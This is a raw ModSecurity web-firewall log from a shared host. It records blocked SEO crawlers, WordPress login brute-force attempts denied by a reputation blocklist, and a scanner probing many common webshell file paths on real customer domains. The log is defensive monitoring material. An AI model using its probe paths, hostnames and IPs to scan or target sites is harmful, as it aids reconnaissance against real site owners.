[Tue May 26 18:07:48.685647 2026] [security2:error] [pid 960743:tid 960916] [client 85.208.96.197:51592] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-camp-week/list/"] [unique_id "ahWUHPQvEln_BHBy2zKJkgAAALA"]
[Tue May 26 18:07:48.685805 2026] [security2:error] [pid 960743:tid 960916] [client 85.208.96.197:51592] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-camp-week/list/"] [unique_id "ahWUHPQvEln_BHBy2zKJkgAAALA"]
[Tue May 26 18:07:48.838588 2026] [security2:error] [pid 960743:tid 960815] [remote 123.30.233.12:56928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUHPQvEln_BHBy2zKJjgAAp0c"]
[Tue May 26 18:07:49.399908 2026] [security2:error] [pid 960743:tid 960794] [remote 123.30.233.12:56928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUHfQvEln_BHBy2zKJmwAAsTI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:07:49.917806 2026] [security2:error] [pid 960743:tid 960896] [client 185.192.70.99:42509] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/config.php"] [unique_id "ahWUHfQvEln_BHBy2zKJrwAAAJw"]
[Tue May 26 18:07:50.664428 2026] [security2:error] [pid 960743:tid 960958] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUHvQvEln_BHBy2zKJuAAAANo"]
[Tue May 26 18:07:50.937677 2026] [security2:error] [pid 960743:tid 960876] [client 185.192.70.74:58245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/special.php"] [unique_id "ahWUHvQvEln_BHBy2zKJywAAAIg"]
[Tue May 26 18:07:51.286115 2026] [security2:error] [pid 960743:tid 960931] [client 173.239.254.134:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWUGfQvEln_BHBy2zKJUgAAv08"]
[Tue May 26 18:07:51.317890 2026] [security2:error] [pid 960743:tid 960907] [client 92.222.108.126:42026] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.kexcouriers.com"] [uri "/robots.txt"] [unique_id "ahWUH_QvEln_BHBy2zKJ0gAAAKc"]
[Tue May 26 18:07:51.318015 2026] [security2:error] [pid 960743:tid 960907] [client 92.222.108.126:42026] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.kexcouriers.com"] [uri "/robots.txt"] [unique_id "ahWUH_QvEln_BHBy2zKJ0gAAAKc"]
[Tue May 26 18:07:51.981255 2026] [security2:error] [pid 960743:tid 960896] [client 185.192.70.91:52699] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/assets/script.js.php"] [unique_id "ahWUH_QvEln_BHBy2zKJ5QAAAJw"]
[Tue May 26 18:07:52.660581 2026] [security2:error] [pid 960743:tid 960979] [client 54.39.210.143:59838] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.kexcouriers.com"] [uri "/"] [unique_id "ahWUIPQvEln_BHBy2zKJ-QAAAO8"]
[Tue May 26 18:07:52.660696 2026] [security2:error] [pid 960743:tid 960979] [client 54.39.210.143:59838] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.kexcouriers.com"] [uri "/"] [unique_id "ahWUIPQvEln_BHBy2zKJ-QAAAO8"]
[Tue May 26 18:07:53.036736 2026] [security2:error] [pid 960743:tid 960964] [client 185.192.70.98:55671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/themes/twentytwentythree/patterns/index.php"] [unique_id "ahWUIfQvEln_BHBy2zKKAwAAAOA"]
[Tue May 26 18:07:53.125651 2026] [security2:error] [pid 960743:tid 960889] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUIPQvEln_BHBy2zKJ-gAAAJU"]
[Tue May 26 18:07:54.017651 2026] [security2:error] [pid 960743:tid 960917] [client 185.192.70.69:42699] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/css/colors/sunrise/colors_95.php"] [unique_id "ahWUIvQvEln_BHBy2zKKIQAAALE"]
[Tue May 26 18:07:54.604488 2026] [security2:error] [pid 960743:tid 960861] [remote 173.249.15.100:53208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.15.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWUIvQvEln_BHBy2zKKLwAAmnU"]
[Tue May 26 18:07:54.675598 2026] [security2:error] [pid 960743:tid 960995] [client 82.76.238.33:55698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUIvQvEln_BHBy2zKKNQAAAP8"]
[Tue May 26 18:07:54.675770 2026] [security2:error] [pid 960743:tid 960995] [client 82.76.238.33:55698] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUIvQvEln_BHBy2zKKNQAAAP8"]
[Tue May 26 18:07:54.880248 2026] [security2:error] [pid 960743:tid 960949] [client 185.192.70.80:39981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 80.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/block-patterns/autoload_classmap.php"] [unique_id "ahWUIvQvEln_BHBy2zKKRAAAANE"]
[Tue May 26 18:07:55.168017 2026] [security2:error] [pid 960743:tid 960955] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUIvQvEln_BHBy2zKKOwAAANc"]
[Tue May 26 18:07:56.574866 2026] [security2:error] [pid 960743:tid 960856] [remote 72.167.150.128:47324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUJPQvEln_BHBy2zKKYwAAk3A"]
[Tue May 26 18:07:56.616671 2026] [security2:error] [pid 960743:tid 960865] [remote 173.249.15.100:53208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.15.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWUJPQvEln_BHBy2zKKagAAsnk"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 18:07:56.682432 2026] [security2:error] [pid 960743:tid 960848] [remote 64.31.25.250:37380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.25.31.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUJPQvEln_BHBy2zKKaQAAv2g"]
[Tue May 26 18:07:56.874223 2026] [security2:error] [pid 960743:tid 960867] [remote 72.167.150.128:47324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUJPQvEln_BHBy2zKKcQAAqXs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:07:57.093169 2026] [security2:error] [pid 960743:tid 960923] [client 185.192.70.86:59963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/uploads/wp.php"] [unique_id "ahWUJfQvEln_BHBy2zKKeQAAALc"]
[Tue May 26 18:07:57.399379 2026] [security2:error] [pid 960743:tid 960906] [client 103.76.108.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUJPQvEln_BHBy2zKKeAAAAKY"]
[Tue May 26 18:07:57.800308 2026] [security2:error] [pid 960743:tid 960930] [client 51.68.236.59:29545] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "freshmindsolutions.com"] [uri "/robots.txt"] [unique_id "ahWUJfQvEln_BHBy2zKKjAAAAL4"]
[Tue May 26 18:07:57.800430 2026] [security2:error] [pid 960743:tid 960930] [client 51.68.236.59:29545] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "freshmindsolutions.com"] [uri "/robots.txt"] [unique_id "ahWUJfQvEln_BHBy2zKKjAAAAL4"]
[Tue May 26 18:07:58.029621 2026] [security2:error] [pid 960743:tid 960991] [client 185.192.70.93:41789] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/certificates/about.php"] [unique_id "ahWUJvQvEln_BHBy2zKKmwAAAPs"]
[Tue May 26 18:07:58.392395 2026] [security2:error] [pid 960743:tid 960969] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUJfQvEln_BHBy2zKKkgAAAOU"]
[Tue May 26 18:07:59.039952 2026] [security2:error] [pid 960743:tid 960936] [client 185.192.70.88:35079] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/cgi-bin/class.api.php"] [unique_id "ahWUJ_QvEln_BHBy2zKKuQAAAMQ"]
[Tue May 26 18:08:00.770597 2026] [security2:error] [pid 960743:tid 960753] [remote 64.31.25.250:37380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.25.31.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUKPQvEln_BHBy2zKK1QAAmgk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:08:00.907227 2026] [security2:error] [pid 960743:tid 960885] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUKPQvEln_BHBy2zKK0QAAAJE"]
[Tue May 26 18:08:00.973981 2026] [security2:error] [pid 960743:tid 960961] [client 185.192.70.72:42679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/cache/index.php"] [unique_id "ahWUKPQvEln_BHBy2zKK1wAAAN0"]
[Tue May 26 18:08:02.358004 2026] [security2:error] [pid 960743:tid 960970] [client 185.192.70.71:63121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/css/colors/blue/file.php"] [unique_id "ahWUKvQvEln_BHBy2zKLBAAAAOY"]
[Tue May 26 18:08:02.485301 2026] [security2:error] [pid 960743:tid 960831] [remote 4.194.248.64:58330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 64.248.194.4.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWUKvQvEln_BHBy2zKLAgAA_1c"]
[Tue May 26 18:08:02.642859 2026] [security2:error] [pid 960743:tid 960833] [remote 222.165.190.235:52334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUKvQvEln_BHBy2zKLCAAA01k"]
[Tue May 26 18:08:02.909392 2026] [security2:error] [pid 960743:tid 960839] [remote 4.194.248.64:58330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 64.248.194.4.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWUKvQvEln_BHBy2zKLEgAAul8"], referer: https://kurgu-afrika.com/wp-login.php
[Tue May 26 18:08:03.093576 2026] [security2:error] [pid 960743:tid 960835] [remote 222.165.190.235:52334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUK_QvEln_BHBy2zKLFgAA5Fs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:08:03.330264 2026] [security2:error] [pid 960743:tid 960969] [client 185.192.70.81:47717] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/edit.php"] [unique_id "ahWUK_QvEln_BHBy2zKLIAAAAOU"]
[Tue May 26 18:08:03.430738 2026] [security2:error] [pid 960743:tid 960974] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUKvQvEln_BHBy2zKLFQAAAOo"]
[Tue May 26 18:08:03.490296 2026] [security2:error] [pid 960743:tid 960838] [remote 198.244.240.168:33186] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "senoro.com.mx"] [uri "/robots.txt"] [unique_id "ahWUK_QvEln_BHBy2zKLJAAAsl4"]
[Tue May 26 18:08:03.490453 2026] [security2:error] [pid 960743:tid 960918] [client 198.244.240.168:33186] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "senoro.com.mx"] [uri "/robots.txt"] [unique_id "ahWUK_QvEln_BHBy2zKLJAAAsl4"]
[Tue May 26 18:08:04.400568 2026] [security2:error] [pid 960743:tid 960952] [client 185.192.70.83:41893] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/webdb.php"] [unique_id "ahWULPQvEln_BHBy2zKLOAAAANQ"]
[Tue May 26 18:08:04.962222 2026] [security2:error] [pid 960743:tid 960840] [remote 51.222.168.54:48712] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "senoro.com.mx"] [uri "/"] [unique_id "ahWULPQvEln_BHBy2zKLSAAA02A"]
[Tue May 26 18:08:04.962457 2026] [security2:error] [pid 960743:tid 960951] [client 51.222.168.54:48712] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "senoro.com.mx"] [uri "/"] [unique_id "ahWULPQvEln_BHBy2zKLSAAA02A"]
[Tue May 26 18:08:05.630096 2026] [security2:error] [pid 960743:tid 960880] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWULfQvEln_BHBy2zKLTAAAAIw"]
[Tue May 26 18:08:05.983215 2026] [security2:error] [pid 960743:tid 960759] [remote 45.32.67.165:36236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahWULfQvEln_BHBy2zKLXwAA4Q8"]
[Tue May 26 18:08:06.369429 2026] [security2:error] [pid 960743:tid 960996] [client 185.192.70.79:53565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 79.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/assets/images/doc.php"] [unique_id "ahWULvQvEln_BHBy2zKLbgAAAQA"]
[Tue May 26 18:08:07.095349 2026] [security2:error] [pid 960743:tid 960983] [client 82.76.238.33:56214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUL_QvEln_BHBy2zKLfgAAAPM"]
[Tue May 26 18:08:07.095507 2026] [security2:error] [pid 960743:tid 960983] [client 82.76.238.33:56214] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUL_QvEln_BHBy2zKLfgAAAPM"]
[Tue May 26 18:08:07.208603 2026] [security2:error] [pid 960743:tid 960890] [client 185.192.70.89:60799] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 89.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/file2.php"] [unique_id "ahWUL_QvEln_BHBy2zKLfwAAAJY"]
[Tue May 26 18:08:08.137291 2026] [security2:error] [pid 960743:tid 960899] [client 185.192.70.78:55949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 78.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/ID3/wp-work.php"] [unique_id "ahWUMPQvEln_BHBy2zKLmQAAAJ8"]
[Tue May 26 18:08:08.526923 2026] [security2:error] [pid 960743:tid 960985] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUMPQvEln_BHBy2zKLlQAAAPU"]
[Tue May 26 18:08:09.020750 2026] [security2:error] [pid 960743:tid 960881] [client 185.192.70.101:33223] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/alfa.php"] [unique_id "ahWUMfQvEln_BHBy2zKLrQAAAI0"]
[Tue May 26 18:08:09.197073 2026] [security2:error] [pid 960743:tid 960845] [remote 78.142.18.172:58156] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUMPQvEln_BHBy2zKLrAAAwmU"]
[Tue May 26 18:08:10.097102 2026] [security2:error] [pid 960743:tid 960947] [client 185.192.70.94:50861] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 94.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/css/colors/blue/admin.php"] [unique_id "ahWUMvQvEln_BHBy2zKLxwAAAM8"]
